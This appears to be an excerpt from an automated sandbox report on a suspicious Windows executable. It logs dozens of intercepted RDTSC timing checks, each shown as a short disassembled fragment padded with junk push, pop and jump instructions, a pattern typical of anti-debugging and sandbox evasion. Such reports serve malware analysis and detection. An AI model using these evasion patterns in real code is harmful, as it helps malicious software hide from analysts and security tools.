Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 10CEFB9 second address: 10CEFEA instructions: 0x00000000 rdtsc 0x00000002 jg 00007F3FE0C24E6Ch 0x00000008 jmp 00007F3FE0C24E64h 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F3FE0C24E5Fh 0x00000018 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 10CEFEA second address: 10CEFFA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3FE11BFDCAh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 10CEFFA second address: 10CEFFE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 10CF2EA second address: 10CF31B instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jmp 00007F3FE11BFDD1h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F3FE11BFDD6h 0x00000012 push eax 0x00000013 pop eax 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 10CF31B second address: 10CF342 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3FE0C24E63h 0x00000007 jnl 00007F3FE0C24E56h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jne 00007F3FE0C24E5Eh 0x00000015 pushad 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 10CF342 second address: 10CF350 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 jl 00007F3FE11BFDC6h 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 10D04C0 second address: 10D04E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jno 00007F3FE0C24E5Eh 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F3FE0C24E5Ch 0x00000012 je 00007F3FE0C24E56h 0x00000018 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 10D901C second address: 10D9023 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 10D9023 second address: 10D902B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 10D902B second address: 10D902F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 10D8773 second address: 10D8792 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3FE0C24E65h 0x00000007 jo 00007F3FE0C24E75h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 10DF820 second address: 10DF853 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F3FE11BFDC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a ja 00007F3FE11BFDC8h 0x00000010 push esi 0x00000011 pop esi 0x00000012 jmp 00007F3FE11BFDD5h 0x00000017 popad 0x00000018 push ebx 0x00000019 push eax 0x0000001a push edx 0x0000001b push ecx 0x0000001c pop ecx 0x0000001d jbe 00007F3FE11BFDC6h 0x00000023 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 10E00E0 second address: 10E00F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3FE0C24E5Fh 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 10E00F3 second address: 10E0109 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push edx 0x0000000b pop edx 0x0000000c jmp 00007F3FE11BFDCAh 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 10E0109 second address: 10E0118 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edi 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c pushad 0x0000000d popad 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 10E0118 second address: 10E0136 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3FE11BFDCEh 0x00000007 jnp 00007F3FE11BFDD2h 0x0000000d jbe 00007F3FE11BFDC6h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 10E099D second address: 10E09A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 10E0CCF second address: 10E0CD8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ecx 0x00000006 push eax 0x00000007 pop eax 0x00000008 pop ecx 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 10E0CD8 second address: 10E0CE2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007F3FE0C24E56h 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 10EA053 second address: 10EA057 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 10E9368 second address: 10E936E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 10E936E second address: 10E9373 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 10E9373 second address: 10E9378 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 10E9378 second address: 10E9393 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3FE11BFDD3h 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 10E962A second address: 10E963A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jg 00007F3FE0C24E56h 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 10E963A second address: 10E9650 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3FE11BFDCCh 0x00000007 jnp 00007F3FE11BFDC6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 10E9803 second address: 10E980D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 10E980D second address: 10E9811 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 10E9811 second address: 10E9815 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 10E9979 second address: 10E9993 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jnc 00007F3FE11BFDCAh 0x0000000e jc 00007F3FE11BFDCCh 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 10E9993 second address: 10E9997 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 10F01CF second address: 10F01D9 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F3FE11BFDC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 10F01D9 second address: 10F01F4 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push edx 0x00000004 pop edx 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push edi 0x0000000b push edi 0x0000000c pop edi 0x0000000d pushad 0x0000000e popad 0x0000000f pop edi 0x00000010 jmp 00007F3FE0C24E5Bh 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 10F04B2 second address: 10F04BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push esi 0x00000007 pop esi 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 10F064E second address: 10F0678 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jnc 00007F3FE0C24E5Eh 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F3FE0C24E65h 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 10F0678 second address: 10F067E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 10F094E second address: 10F0956 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 10F0956 second address: 10F095A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 10F095A second address: 10F095E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 10F0AC1 second address: 10F0AC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 10F0AC5 second address: 10F0AE2 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F3FE0C24E64h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 10F0C1E second address: 10F0C3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3FE11BFDD6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 10F0D99 second address: 10F0DA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 10F0DA4 second address: 10F0DA8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 10F0DA8 second address: 10F0DAE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 10FBF7C second address: 10FBF82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 10FBB1E second address: 10FBB3D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3FE0C24E69h 0x00000007 push eax 0x00000008 push edx 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 10FBB3D second address: 10FBB41 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 110D266 second address: 110D26A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 1112BB8 second address: 1112BD0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3FE11BFDCEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 1112BD0 second address: 1112BDB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F3FE0C24E56h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 1112BDB second address: 1112BFA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3FE11BFDD9h 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 1112BFA second address: 1112C00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 111B73E second address: 111B74E instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jg 00007F3FE11BFDC6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 111B74E second address: 111B752 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 111B752 second address: 111B769 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3FE11BFDD1h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 111B769 second address: 111B777 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 jl 00007F3FE0C24E56h 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 111B777 second address: 111B79B instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F3FE11BFDCEh 0x0000000f jmp 00007F3FE11BFDCCh 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 111B79B second address: 111B7C4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3FE0C24E62h 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b jmp 00007F3FE0C24E61h 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 111E226 second address: 111E233 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 jg 00007F3FE11BFDC6h 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 111E233 second address: 111E254 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F3FE0C24E6Bh 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 111E254 second address: 111E268 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3FE11BFDD0h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 1121689 second address: 11216A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3FE0C24E69h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 1125DA6 second address: 1125DAA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 11264A5 second address: 11264AE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 11271CA second address: 11271E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3FE11BFDD7h 0x00000009 pop esi 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 112BB4D second address: 112BB51 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 113BF45 second address: 113BF5E instructions: 0x00000000 rdtsc 0x00000002 jo 00007F3FE11BFDC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F3FE11BFDCCh 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 113BF5E second address: 113BF75 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jp 00007F3FE0C24E56h 0x00000009 jmp 00007F3FE0C24E5Ah 0x0000000e pop esi 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 113BD8C second address: 113BD92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 11641A9 second address: 11641C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F3FE0C24E56h 0x0000000a jmp 00007F3FE0C24E5Ch 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 11641C1 second address: 11641D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F3FE11BFDCEh 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 116477B second address: 1164781 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 116489D second address: 11648A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 11648A2 second address: 11648C9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jg 00007F3FE0C24E56h 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e jns 00007F3FE0C24E62h 0x00000014 pop edx 0x00000015 pop eax 0x00000016 push ecx 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 11648C9 second address: 11648CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 11649FC second address: 1164A1A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3FE0C24E62h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jno 00007F3FE0C24E56h 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 1164A1A second address: 1164A1E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 1164A1E second address: 1164A4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3FE0C24E62h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F3FE0C24E61h 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 1166501 second address: 1166505 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 1166505 second address: 1166513 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jg 00007F3FE0C24E56h 0x0000000e rdtsc
